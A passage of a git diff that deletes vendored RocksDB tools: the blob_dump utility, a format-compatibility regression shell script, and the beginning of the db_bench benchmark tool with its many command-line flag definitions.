diff --git a/thirdparty/rocksdb/tools/blob_dump.cc b/thirdparty/rocksdb/tools/blob_dump.cc
deleted file mode 100644
index 73601f2..0000000
--- a/thirdparty/rocksdb/tools/blob_dump.cc
+++ /dev/null
@@ -1,89 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include <getopt.h>
-#include <cstdio>
-#include <string>
-#include <unordered_map>
-
-#include "utilities/blob_db/blob_dump_tool.h"
-
-using namespace rocksdb;
-using namespace rocksdb::blob_db;
-
-int main(int argc, char** argv) {
-  using DisplayType = BlobDumpTool::DisplayType;
-  const std::unordered_map<std::string, DisplayType> display_types = {
-      {"none", DisplayType::kNone},
-      {"raw", DisplayType::kRaw},
-      {"hex", DisplayType::kHex},
-      {"detail", DisplayType::kDetail},
-  };
-  const struct option options[] = {
-      {"help", no_argument, nullptr, 'h'},
-      {"file", required_argument, nullptr, 'f'},
-      {"show_key", optional_argument, nullptr, 'k'},
-      {"show_blob", optional_argument, nullptr, 'b'},
-  };
-  DisplayType show_key = DisplayType::kRaw;
-  DisplayType show_blob = DisplayType::kNone;
-  std::string file;
-  while (true) {
-    int c = getopt_long(argc, argv, "hk::b::f:", options, nullptr);
-    if (c < 0) {
-      break;
-    }
-    std::string arg_str(optarg ? optarg : "");
-    switch (c) {
-      case 'h':
-        fprintf(stdout,
-                "Usage: blob_dump --file=filename "
-                "[--show_key[=none|raw|hex|detail]] "
-                "[--show_blob[=none|raw|hex|detail]]\n");
-        return 0;
-      case 'f':
-        file = optarg;
-        break;
-      case 'k':
-        if (optarg) {
-          if (display_types.count(arg_str) == 0) {
-            fprintf(stderr, "Unrecognized key display type.\n");
-            return -1;
-          }
-          show_key = display_types.at(arg_str);
-        }
-        break;
-      case 'b':
-        if (optarg) {
-          if (display_types.count(arg_str) == 0) {
-            fprintf(stderr, "Unrecognized blob display type.\n");
-            return -1;
-          }
-          show_blob = display_types.at(arg_str);
-        } else {
-          show_blob = DisplayType::kDetail;
-        }
-        break;
-      default:
-        fprintf(stderr, "Unrecognized option.\n");
-        return -1;
-    }
-  }
-  BlobDumpTool tool;
-  Status s = tool.Run(file, show_key, show_blob);
-  if (!s.ok()) {
-    fprintf(stderr, "Failed: %s\n", s.ToString().c_str());
-    return -1;
-  }
-  return 0;
-}
-#else
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return -1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/check_format_compatible.sh b/thirdparty/rocksdb/tools/check_format_compatible.sh
deleted file mode 100755
index 8016489..0000000
--- a/thirdparty/rocksdb/tools/check_format_compatible.sh
+++ /dev/null
@@ -1,111 +0,0 @@
-#!/usr/bin/env bash
-#
-# A shell script to load some pre generated data file to a DB using ldb tool
-# ./ldb needs to be avaible to be executed.
-#
-# Usage: <SCRIPT> [checkout]
-# `checkout` can be a tag, commit or branch name. Will build using it and check DBs generated by all previous branches (or tags for very old versions without branch) can be opened by it.
-# Return value 0 means all regression tests pass. 1 if not pass.
-
-scriptpath=`dirname $BASH_SOURCE`
-test_dir=${TEST_TMPDIR:-"/tmp"}"/format_compatible_check"
-script_copy_dir=$test_dir"/script_copy"
-input_data_path=$test_dir"/test_data_input/"
-
-mkdir $test_dir || true
-mkdir $input_data_path || true
-rm -rf $script_copy_dir
-cp $scriptpath $script_copy_dir -rf
-
-# Generate four random files.
-for i in {1..6}
-do
-  input_data[$i]=$input_data_path/data$i
-  echo == Generating random input file ${input_data[$i]}
-  python - <<EOF
-import random
-random.seed($i)
-symbols=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
-with open('${input_data[$i]}', 'w') as f:
-  for i in range(1,1024):
-    k = ""
-    for j in range(1, random.randint(1,32)):
-      k=k + symbols[random.randint(0, len(symbols) - 1)]
-    vb = ""
-    for j in range(1, random.randint(0,128)):
-      vb = vb + symbols[random.randint(0, len(symbols) - 1)]
-    v = ""
-    for j in range(1, random.randint(1, 5)):
-      v = v + vb
-    print >> f, k + " ==> " + v
-EOF
-done
-
-declare -a backward_compatible_checkout_objs=("2.2.fb.branch" "2.3.fb.branch" "2.4.fb.branch" "2.5.fb.branch" "2.6.fb.branch" "2.7.fb.branch" "2.8.1.fb" "3.0.fb.branch" "3.1.fb" "3.2.fb" "3.3.fb" "3.4.fb" "3.5.fb" "3.6.fb" "3.7.fb" "3.8.fb" "3.9.fb")
-declare -a forward_compatible_checkout_objs=("3.10.fb" "3.11.fb" "3.12.fb" "3.13.fb" "4.0.fb" "4.1.fb" "4.2.fb" "4.3.fb" "4.4.fb" "4.5.fb" "4.6.fb" "4.7.fb" "4.8.fb" "4.9.fb" "4.10.fb" "4.11.fb" "4.12.fb" "4.13.fb" "5.0.fb" "5.1.fb" "5.2.fb" "5.3.fb" "5.4.fb" "5.5.fb" "5.6.fb")
-declare -a checkout_objs=(${backward_compatible_checkout_objs[@]} ${forward_compatible_checkout_objs[@]})
-
-generate_db()
-{
-    set +e
-    $script_copy_dir/generate_random_db.sh $1 $2
-    if [ $? -ne 0 ]; then
-        echo ==== Error loading data from $2 to $1 ====
-        exit 1
-    fi
-    set -e
-}
-
-compare_db()
-{
-    set +e
-    $script_copy_dir/verify_random_db.sh $1 $2 $3 $4
-    if [ $? -ne 0 ]; then
-        echo ==== Read different content from $1 and $2 or error happened. ====
-        exit 1
-    fi
-    set -e
-}
-
-# Sandcastle sets us up with a remote that is just another directory on the same
-# machine and doesn't have our branches. Need to fetch them so checkout works.
-# Remote add may fail if added previously (we don't cleanup).
-git remote add github_origin "https://github.com/facebook/rocksdb.git"
-set -e
-https_proxy="fwdproxy:8080" git fetch github_origin
-
-for checkout_obj in "${checkout_objs[@]}"
-do
-   echo == Generating DB from "$checkout_obj" ...
-   https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj
-   make clean
-   make ldb -j32
-   generate_db $input_data_path $test_dir/$checkout_obj
-done
-
-checkout_flag=${1:-"master"}
-
-echo == Building $checkout_flag debug
-https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b tmp-$checkout_flag
-make clean
-make ldb -j32
-compare_base_db_dir=$test_dir"/base_db_dir"
-echo == Generate compare base DB to $compare_base_db_dir
-generate_db $input_data_path $compare_base_db_dir
-
-for checkout_obj in "${checkout_objs[@]}"
-do
-   echo == Opening DB from "$checkout_obj" using debug build of $checkout_flag ...
-   compare_db $test_dir/$checkout_obj $compare_base_db_dir db_dump.txt 1
-done
-
-for checkout_obj in "${forward_compatible_checkout_objs[@]}"
-do
-   echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag...
-   git checkout $checkout_obj
-   make clean
-   make ldb -j32
-   compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0
-done
-
-echo ==== Compatibility Test PASSED ====
diff --git a/thirdparty/rocksdb/tools/db_bench.cc b/thirdparty/rocksdb/tools/db_bench.cc
deleted file mode 100644
index 634bbba..0000000
--- a/thirdparty/rocksdb/tools/db_bench.cc
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2013-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-#include <rocksdb/db_bench_tool.h>
-int main(int argc, char** argv) { return rocksdb::db_bench_tool(argc, argv); }
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/tools/db_bench_tool.cc b/thirdparty/rocksdb/tools/db_bench_tool.cc
deleted file mode 100644
index 0f89095..0000000
--- a/thirdparty/rocksdb/tools/db_bench_tool.cc
+++ /dev/null
@@ -1,5328 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#ifdef GFLAGS
-#ifdef NUMA
-#include <numa.h>
-#include <numaif.h>
-#endif
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <fcntl.h>
-#include <gflags/gflags.h>
-#include <inttypes.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/types.h>
-#include <atomic>
-#include <condition_variable>
-#include <cstddef>
-#include <memory>
-#include <mutex>
-#include <thread>
-#include <unordered_map>
-
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "hdfs/env_hdfs.h"
-#include "monitoring/histogram.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/utilities/object_registry.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/options_util.h"
-#include "rocksdb/utilities/sim_cache.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/write_batch.h"
-#include "util/cast_util.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "util/testutil.h"
-#include "util/transaction_test_util.h"
-#include "util/xxhash.h"
-#include "utilities/blob_db/blob_db.h"
-#include "utilities/merge_operators.h"
-#include "utilities/persistent_cache/block_cache_tier.h"
-
-#ifdef OS_WIN
-#include <io.h>  // open/close
-#endif
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_string(
-    benchmarks,
-    "fillseq,"
-    "fillseqdeterministic,"
-    "fillsync,"
-    "fillrandom,"
-    "filluniquerandomdeterministic,"
-    "overwrite,"
-    "readrandom,"
-    "newiterator,"
-    "newiteratorwhilewriting,"
-    "seekrandom,"
-    "seekrandomwhilewriting,"
-    "seekrandomwhilemerging,"
-    "readseq,"
-    "readreverse,"
-    "compact,"
-    "compactall,"
-    "readrandom,"
-    "multireadrandom,"
-    "readseq,"
-    "readtocache,"
-    "readreverse,"
-    "readwhilewriting,"
-    "readwhilemerging,"
-    "readrandomwriterandom,"
-    "updaterandom,"
-    "randomwithverify,"
-    "fill100K,"
-    "crc32c,"
-    "xxhash,"
-    "compress,"
-    "uncompress,"
-    "acquireload,"
-    "fillseekseq,"
-    "randomtransaction,"
-    "randomreplacekeys,"
-    "timeseries",
-
-    "Comma-separated list of operations to run in the specified"
-    " order. Available benchmarks:\n"
-    "\tfillseq       -- write N values in sequential key"
-    " order in async mode\n"
-    "\tfillseqdeterministic       -- write N values in the specified"
-    " key order and keep the shape of the LSM tree\n"
-    "\tfillrandom    -- write N values in random key order in async"
-    " mode\n"
-    "\tfilluniquerandomdeterministic       -- write N values in a random"
-    " key order and keep the shape of the LSM tree\n"
-    "\toverwrite     -- overwrite N values in random key order in"
-    " async mode\n"
-    "\tfillsync      -- write N/100 values in random key order in "
-    "sync mode\n"
-    "\tfill100K      -- write N/1000 100K values in random order in"
-    " async mode\n"
-    "\tdeleteseq     -- delete N keys in sequential order\n"
-    "\tdeleterandom  -- delete N keys in random order\n"
-    "\treadseq       -- read N times sequentially\n"
-    "\treadtocache   -- 1 thread reading database sequentially\n"
-    "\treadreverse   -- read N times in reverse order\n"
-    "\treadrandom    -- read N times in random order\n"
-    "\treadmissing   -- read N missing keys in random order\n"
-    "\treadwhilewriting      -- 1 writer, N threads doing random "
-    "reads\n"
-    "\treadwhilemerging      -- 1 merger, N threads doing random "
-    "reads\n"
-    "\treadrandomwriterandom -- N threads doing random-read, "
-    "random-write\n"
-    "\tprefixscanrandom      -- prefix scan N times in random order\n"
-    "\tupdaterandom  -- N threads doing read-modify-write for random "
-    "keys\n"
-    "\tappendrandom  -- N threads doing read-modify-write with "
-    "growing values\n"
-    "\tmergerandom   -- same as updaterandom/appendrandom using merge"
-    " operator. "
-    "Must be used with merge_operator\n"
-    "\treadrandommergerandom -- perform N random read-or-merge "
-    "operations. Must be used with merge_operator\n"
-    "\tnewiterator   -- repeated iterator creation\n"
-    "\tseekrandom    -- N random seeks, call Next seek_nexts times "
-    "per seek\n"
-    "\tseekrandomwhilewriting -- seekrandom and 1 thread doing "
-    "overwrite\n"
-    "\tseekrandomwhilemerging -- seekrandom and 1 thread doing "
-    "merge\n"
-    "\tcrc32c        -- repeated crc32c of 4K of data\n"
-    "\txxhash        -- repeated xxHash of 4K of data\n"
-    "\tacquireload   -- load N*1000 times\n"
-    "\tfillseekseq   -- write N values in sequential key, then read "
-    "them by seeking to each key\n"
-    "\trandomtransaction     -- execute N random transactions and "
-    "verify correctness\n"
-    "\trandomreplacekeys     -- randomly replaces N keys by deleting "
-    "the old version and putting the new version\n\n"
-    "\ttimeseries            -- 1 writer generates time series data "
-    "and multiple readers doing random reads on id\n\n"
-    "Meta operations:\n"
-    "\tcompact     -- Compact the entire DB; If multiple, randomly choose one\n"
-    "\tcompactall  -- Compact the entire DB\n"
-    "\tstats       -- Print DB stats\n"
-    "\tresetstats  -- Reset DB stats\n"
-    "\tlevelstats  -- Print the number of files and bytes per level\n"
-    "\tsstables    -- Print sstable info\n"
-    "\theapprofile -- Dump a heap profile (if supported by this"
-    " port)\n");
-
-DEFINE_int64(num, 1000000, "Number of key/values to place in database");
-
-DEFINE_int64(numdistinct, 1000,
-             "Number of distinct keys to use. Used in RandomWithVerify to "
-             "read/write on fewer keys so that gets are more likely to find the"
-             " key and puts are more likely to update the same key");
-
-DEFINE_int64(merge_keys, -1,
-             "Number of distinct keys to use for MergeRandom and "
-             "ReadRandomMergeRandom. "
-             "If negative, there will be FLAGS_num keys.");
-DEFINE_int32(num_column_families, 1, "Number of Column Families to use.");
-
-DEFINE_int32(
-    num_hot_column_families, 0,
-    "Number of Hot Column Families. If more than 0, only write to this "
-    "number of column families. After finishing all the writes to them, "
-    "create new set of column families and insert to them. Only used "
-    "when num_column_families > 1.");
-
-DEFINE_string(column_family_distribution, "",
-              "Comma-separated list of percentages, where the ith element "
-              "indicates the probability of an op using the ith column family. "
-              "The number of elements must be `num_hot_column_families` if "
-              "specified; otherwise, it must be `num_column_families`. The "
-              "sum of elements must be 100. E.g., if `num_column_families=4`, "
-              "and `num_hot_column_families=0`, a valid list could be "
-              "\"10,20,30,40\".");
-
-DEFINE_int64(reads, -1, "Number of read operations to do.  "
-             "If negative, do FLAGS_num reads.");
-
-DEFINE_int64(deletes, -1, "Number of delete operations to do.  "
-             "If negative, do FLAGS_num deletions.");
-
-DEFINE_int32(bloom_locality, 0, "Control bloom filter probes locality");
-
-DEFINE_int64(seed, 0, "Seed base for random number generators. "
-             "When 0 it is deterministic.");
-
-DEFINE_int32(threads, 1, "Number of concurrent threads to run.");
-
-DEFINE_int32(duration, 0, "Time in seconds for the random-ops tests to run."
-             " When 0 then num & reads determine the test duration");
-
-DEFINE_int32(value_size, 100, "Size of each value");
-
-DEFINE_int32(seek_nexts, 0,
-             "How many times to call Next() after Seek() in "
-             "fillseekseq, seekrandom, seekrandomwhilewriting and "
-             "seekrandomwhilemerging");
-
-DEFINE_bool(reverse_iterator, false,
-            "When true use Prev rather than Next for iterators that do "
-            "Seek and then Next");
-
-DEFINE_bool(use_uint64_comparator, false, "use Uint64 user comparator");
-
-DEFINE_int64(batch_size, 1, "Batch size");
-
-static bool ValidateKeySize(const char* flagname, int32_t value) {
-  return true;
-}
-
-static bool ValidateUint32Range(const char* flagname, uint64_t value) {
-  if (value > std::numeric_limits<uint32_t>::max()) {
-    fprintf(stderr, "Invalid value for --%s: %lu, overflow\n", flagname,
-            (unsigned long)value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_int32(key_size, 16, "size of each key");
-
-DEFINE_int32(num_multi_db, 0,
-             "Number of DBs used in the benchmark. 0 means single DB.");
-
-DEFINE_double(compression_ratio, 0.5, "Arrange to generate values that shrink"
-              " to this fraction of their original size after compression");
-
-DEFINE_double(read_random_exp_range, 0.0,
-              "Read random's key will be generated using distribution of "
-              "num * exp(-r) where r is uniform number from 0 to this value. "
-              "The larger the number is, the more skewed the reads are. "
-              "Only used in readrandom and multireadrandom benchmarks.");
-
-DEFINE_bool(histogram, false, "Print histogram of operation timings");
-
-DEFINE_bool(enable_numa, false,
-            "Make operations aware of NUMA architecture and bind memory "
-            "and cpus corresponding to nodes together. In NUMA, memory "
-            "in same node as CPUs are closer when compared to memory in "
-            "other nodes. Reads can be faster when the process is bound to "
-            "CPU and memory of same node. Use \"$numactl --hardware\" command "
-            "to see NUMA memory architecture.");
-
-DEFINE_int64(db_write_buffer_size, rocksdb::Options().db_write_buffer_size,
-             "Number of bytes to buffer in all memtables before compacting");
-
-DEFINE_bool(cost_write_buffer_to_cache, false,
-            "The usage of memtable is costed to the block cache");
-
-DEFINE_int64(write_buffer_size, rocksdb::Options().write_buffer_size,
-             "Number of bytes to buffer in memtable before compacting");
-
-DEFINE_int32(max_write_buffer_number,
-             rocksdb::Options().max_write_buffer_number,
-             "The number of in-memory memtables. Each memtable is of size"
-             "write_buffer_size.");
-
-DEFINE_int32(min_write_buffer_number_to_merge,
-             rocksdb::Options().min_write_buffer_number_to_merge,
-             "The minimum number of write buffers that will be merged together"
-             "before writing to storage. This is cheap because it is an"
-             "in-memory merge. If this feature is not enabled, then all these"
-             "write buffers are flushed to L0 as separate files and this "
-             "increases read amplification because a get request has to check"
-             " in all of these files. Also, an in-memory merge may result in"
-             " writing less data to storage if there are duplicate records "
-             " in each of these individual write buffers.");
-
-DEFINE_int32(max_write_buffer_number_to_maintain,
-             rocksdb::Options().max_write_buffer_number_to_maintain,
-             "The total maximum number of write buffers to maintain in memory "
-             "including copies of buffers that have already been flushed. "
-             "Unlike max_write_buffer_number, this parameter does not affect "
-             "flushing. This controls the minimum amount of write history "
-             "that will be available in memory for conflict checking when "
-             "Transactions are used. If this value is too low, some "
-             "transactions may fail at commit time due to not being able to "
-             "determine whether there were any write conflicts. Setting this "
-             "value to 0 will cause write buffers to be freed immediately "
-             "after they are flushed.  If this value is set to -1, "
-             "'max_write_buffer_number' will be used.");
-
-DEFINE_int32(max_background_jobs,
-             rocksdb::Options().max_background_jobs,
-             "The maximum number of concurrent background jobs that can occur "
-             "in parallel.");
-
-DEFINE_int32(num_bottom_pri_threads, 0,
-             "The number of threads in the bottom-priority thread pool (used "
-             "by universal compaction only).");
-
-DEFINE_int32(num_high_pri_threads, 0,
-             "The maximum number of concurrent background compactions"
-             " that can occur in parallel.");
-
-DEFINE_int32(num_low_pri_threads, 0,
-             "The maximum number of concurrent background compactions"
-             " that can occur in parallel.");
-
-DEFINE_int32(max_background_compactions,
-             rocksdb::Options().max_background_compactions,
-             "The maximum number of concurrent background compactions"
-             " that can occur in parallel.");
-
-DEFINE_int32(base_background_compactions, -1, "DEPRECATED");
-
-DEFINE_uint64(subcompactions, 1,
-              "Maximum number of subcompactions to divide L0-L1 compactions "
-              "into.");
-static const bool FLAGS_subcompactions_dummy
-    __attribute__((unused)) = RegisterFlagValidator(&FLAGS_subcompactions,
-                                                    &ValidateUint32Range);
-
-DEFINE_int32(max_background_flushes,
-             rocksdb::Options().max_background_flushes,
-             "The maximum number of concurrent background flushes"
-             " that can occur in parallel.");
-
-static rocksdb::CompactionStyle FLAGS_compaction_style_e;
-DEFINE_int32(compaction_style, (int32_t) rocksdb::Options().compaction_style,
-             "style of compaction: level-based, universal and fifo");
-
-static rocksdb::CompactionPri FLAGS_compaction_pri_e;
-DEFINE_int32(compaction_pri, (int32_t)rocksdb::Options().compaction_pri,
-             "priority of files to compaction: by size or by data age");
-
-DEFINE_int32(universal_size_ratio, 0,
-             "Percentage flexibility while comparing file size"
-             " (for universal compaction only).");
-
-DEFINE_int32(universal_min_merge_width, 0, "The minimum number of files in a"
-             " single compaction run (for universal compaction only).");
-
-DEFINE_int32(universal_max_merge_width, 0, "The max number of files to compact"
-             " in universal style compaction");
-
-DEFINE_int32(universal_max_size_amplification_percent, 0,
-             "The max size amplification for universal style compaction");
-
-DEFINE_int32(universal_compression_size_percent, -1,
-             "The percentage of the database to compress for universal "
-             "compaction. -1 means compress everything.");
-
-DEFINE_bool(universal_allow_trivial_move, false,
-            "Allow trivial move in universal compaction.");
-
-DEFINE_int64(cache_size, 8 << 20,  // 8MB
-             "Number of bytes to use as a cache of uncompressed data");
-
-DEFINE_int32(cache_numshardbits, 6,
-             "Number of shards for the block cache"
-             " is 2 ** cache_numshardbits. Negative means use default settings."
-             " This is applied only if FLAGS_cache_size is non-negative.");
-
-DEFINE_double(cache_high_pri_pool_ratio, 0.0,
-              "Ratio of block cache reserve for high pri blocks. "
-              "If > 0.0, we also enable "
-              "cache_index_and_filter_blocks_with_high_priority.");
-
-DEFINE_bool(use_clock_cache, false,
-            "Replace default LRU block cache with clock cache.");
-
-DEFINE_int64(simcache_size, -1,
-             "Number of bytes to use as a simcache of "
-             "uncompressed data. Nagative value disables simcache.");
-
-DEFINE_bool(cache_index_and_filter_blocks, false,
-            "Cache index/filter blocks in block cache.");
-
-DEFINE_bool(partition_index_and_filters, false,
-            "Partition index and filter blocks.");
-
-DEFINE_int64(metadata_block_size,
-             rocksdb::BlockBasedTableOptions().metadata_block_size,
-             "Max partition size when partitioning index/filters");
-
-// The default reduces the overhead of reading time with flash. With HDD, which
-// offers much less throughput, however, this number better to be set to 1.
-DEFINE_int32(ops_between_duration_checks, 1000,
-             "Check duration limit every x ops");
-
-DEFINE_bool(pin_l0_filter_and_index_blocks_in_cache, false,
-            "Pin index/filter blocks of L0 files in block cache.");
-
-DEFINE_int32(block_size,
-             static_cast<int32_t>(rocksdb::BlockBasedTableOptions().block_size),
-             "Number of bytes in a block.");
-
-DEFINE_int32(block_restart_interval,
-             rocksdb::BlockBasedTableOptions().block_restart_interval,
-             "Number of keys between restart points "
-             "for delta encoding of keys in data block.");
-
-DEFINE_int32(index_block_restart_interval,
-             rocksdb::BlockBasedTableOptions().index_block_restart_interval,
-             "Number of keys between restart points "
-             "for delta encoding of keys in index block.");
-
-DEFINE_int32(read_amp_bytes_per_bit,
-             rocksdb::BlockBasedTableOptions().read_amp_bytes_per_bit,
-             "Number of bytes per bit to be used in block read-amp bitmap");
-
-DEFINE_int64(compressed_cache_size, -1,
-             "Number of bytes to use as a cache of compressed data.");
-
-DEFINE_int64(row_cache_size, 0,
-             "Number of bytes to use as a cache of individual rows"
-             " (0 = disabled).");
-
-DEFINE_int32(open_files, rocksdb::Options().max_open_files,
-             "Maximum number of files to keep open at the same time"
-             " (use default if == 0)");
-
-DEFINE_int32(file_opening_threads, rocksdb::Options().max_file_opening_threads,
-             "If open_files is set to -1, this option set the number of "
-             "threads that will be used to open files during DB::Open()");
-
-DEFINE_bool(new_table_reader_for_compaction_inputs, true,
-             "If true, uses a separate file handle for compaction inputs");
-
-DEFINE_int32(compaction_readahead_size, 0, "Compaction readahead size");
-
-DEFINE_int32(random_access_max_buffer_size, 1024 * 1024,
-             "Maximum windows randomaccess buffer size");
-
-DEFINE_int32(writable_file_max_buffer_size, 1024 * 1024,
-             "Maximum write buffer for Writable File");
-
-DEFINE_int32(bloom_bits, -1, "Bloom filter bits per key. Negative means"
-             " use default settings.");
-DEFINE_double(memtable_bloom_size_ratio, 0,
-              "Ratio of memtable size used for bloom filter. 0 means no bloom "
-              "filter.");
-DEFINE_bool(memtable_use_huge_page, false,
-            "Try to use huge page in memtables.");
-
-DEFINE_bool(use_existing_db, false, "If true, do not destroy the existing"
-            " database.  If you set this flag and also specify a benchmark that"
-            " wants a fresh database, that benchmark will fail.");
-
-DEFINE_bool(show_table_properties, false,
-            "If true, then per-level table"
-            " properties will be printed on every stats-interval when"
-            " stats_interval is set and stats_per_interval is on.");
-
-DEFINE_string(db, "", "Use the db with the following name.");
-
-// Read cache flags
-
-DEFINE_string(read_cache_path, "",
-              "If not empty string, a read cache will be used in this path");
-
-DEFINE_int64(read_cache_size, 4LL * 1024 * 1024 * 1024,
-             "Maximum size of the read cache");
-
-DEFINE_bool(read_cache_direct_write, true,
-            "Whether to use Direct IO for writing to the read cache");
-
-DEFINE_bool(read_cache_direct_read, true,
-            "Whether to use Direct IO for reading from read cache");
-
-static bool ValidateCacheNumshardbits(const char* flagname, int32_t value) {
-  if (value >= 20) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be < 20\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_bool(verify_checksum, true,
-            "Verify checksum for every block read"
-            " from storage");
-
-DEFINE_bool(statistics, false, "Database statistics");
-DEFINE_string(statistics_string, "", "Serialized statistics string");
-static class std::shared_ptr<rocksdb::Statistics> dbstats;
-
-DEFINE_int64(writes, -1, "Number of write operations to do. If negative, do"
-             " --num reads.");
-
-DEFINE_bool(finish_after_writes, false, "Write thread terminates after all writes are finished");
-
-DEFINE_bool(sync, false, "Sync all writes to disk");
-
-DEFINE_bool(use_fsync, false, "If true, issue fsync instead of fdatasync");
-
-DEFINE_bool(disable_wal, false, "If true, do not write WAL for write.");
-
-DEFINE_string(wal_dir, "", "If not empty, use the given dir for WAL");
-
-DEFINE_string(truth_db, "/dev/shm/truth_db/dbbench",
-              "Truth key/values used when using verify");
-
-DEFINE_int32(num_levels, 7, "The total number of levels");
-
-DEFINE_int64(target_file_size_base, rocksdb::Options().target_file_size_base,
-             "Target file size at level-1");
-
-DEFINE_int32(target_file_size_multiplier,
-             rocksdb::Options().target_file_size_multiplier,
-             "A multiplier to compute target level-N file size (N >= 2)");
-
-DEFINE_uint64(max_bytes_for_level_base,
-              rocksdb::Options().max_bytes_for_level_base,
-              "Max bytes for level-1");
-
-DEFINE_bool(level_compaction_dynamic_level_bytes, false,
-            "Whether level size base is dynamic");
-
-DEFINE_double(max_bytes_for_level_multiplier, 10,
-              "A multiplier to compute max bytes for level-N (N >= 2)");
-
-static std::vector<int> FLAGS_max_bytes_for_level_multiplier_additional_v;
-DEFINE_string(max_bytes_for_level_multiplier_additional, "",
-              "A vector that specifies additional fanout per level");
-
-DEFINE_int32(level0_stop_writes_trigger,
-             rocksdb::Options().level0_stop_writes_trigger,
-             "Number of files in level-0"
-             " that will trigger put stop.");
-
-DEFINE_int32(level0_slowdown_writes_trigger,
-             rocksdb::Options().level0_slowdown_writes_trigger,
-             "Number of files in level-0"
-             " that will slow down writes.");
-
-DEFINE_int32(level0_file_num_compaction_trigger,
-             rocksdb::Options().level0_file_num_compaction_trigger,
-             "Number of files in level-0"
-             " when compactions start");
-
-static bool ValidateInt32Percent(const char* flagname, int32_t value) {
-  if (value <= 0 || value>=100) {
-    fprintf(stderr, "Invalid value for --%s: %d, 0< pct <100 \n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(readwritepercent, 90, "Ratio of reads to reads/writes (expressed"
-             " as percentage) for the ReadRandomWriteRandom workload. The "
-             "default value 90 means 90% operations out of all reads and writes"
-             " operations are reads. In other words, 9 gets for every 1 put.");
-
-DEFINE_int32(mergereadpercent, 70, "Ratio of merges to merges&reads (expressed"
-             " as percentage) for the ReadRandomMergeRandom workload. The"
-             " default value 70 means 70% out of all read and merge operations"
-             " are merges. In other words, 7 merges for every 3 gets.");
-
-DEFINE_int32(deletepercent, 2, "Percentage of deletes out of reads/writes/"
-             "deletes (used in RandomWithVerify only). RandomWithVerify "
-             "calculates writepercent as (100 - FLAGS_readwritepercent - "
-             "deletepercent), so deletepercent must be smaller than (100 - "
-             "FLAGS_readwritepercent)");
-
-DEFINE_bool(optimize_filters_for_hits, false,
-            "Optimizes bloom filters for workloads for most lookups return "
-            "a value. For now this doesn't create bloom filters for the max "
-            "level of the LSM to reduce metadata that should fit in RAM. ");
-
-DEFINE_uint64(delete_obsolete_files_period_micros, 0,
-              "Ignored. Left here for backward compatibility");
-
-DEFINE_int64(writes_per_range_tombstone, 0,
-             "Number of writes between range "
-             "tombstones");
-
-DEFINE_int64(range_tombstone_width, 100, "Number of keys in tombstone's range");
-
-DEFINE_int64(max_num_range_tombstones, 0,
-             "Maximum number of range tombstones "
-             "to insert.");
-
-DEFINE_bool(expand_range_tombstones, false,
-            "Expand range tombstone into sequential regular tombstones.");
-
-#ifndef ROCKSDB_LITE
-DEFINE_bool(optimistic_transaction_db, false,
-            "Open a OptimisticTransactionDB instance. "
-            "Required for randomtransaction benchmark.");
-
-DEFINE_bool(use_blob_db, false,
